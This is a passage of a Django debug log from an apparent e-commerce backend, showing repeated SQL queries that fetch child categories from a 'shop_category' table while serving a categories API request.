"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:16:54,308 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:16:54,311 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:16:54,313 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:16:54,316 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:16:54,319 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:16:54,321 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:16:54,324 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:16:54,326 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:16:54,328 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:16:54,332 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:16:54,335 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:16:54,339 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:16:54,342 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:16:54,345 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:16:54,350 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:16:54,353 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:16:54,356 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:16:54,360 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:16:54,363 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:16:54,367 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:16:54,370 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:16:54,373 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:16:54,377 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:16:54,380 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:16:54,384 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:16:54] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:17:03,804 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:17:03,814 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:17:03,818 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:17:03,821 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:17:03,825 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:17:03,827 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:17:03,831 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:17:03,833 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:17:03,836 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:17:03,839 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:17:03,842 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:17:03,845 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:17:03,848 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:17:03,852 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:17:03,856 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:17:03,860 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:17:03,863 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:17:03,867 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:17:03,870 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:17:03,876 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:17:03,879 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:17:03,882 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:17:03,886 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:17:03,889 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:17:03,892 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:17:03,897 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:17:03,900 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:17:03,903 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:17:03,906 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:17:03,909 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:17:03,914 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:17:03,917 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:17:03,921 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:17:03,924 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:17:03,928 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:17:03,933 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:17:03,937 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:17:03,941 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:17:03,944 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:17:03,948 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:17:03,953 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:17:03,958 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", 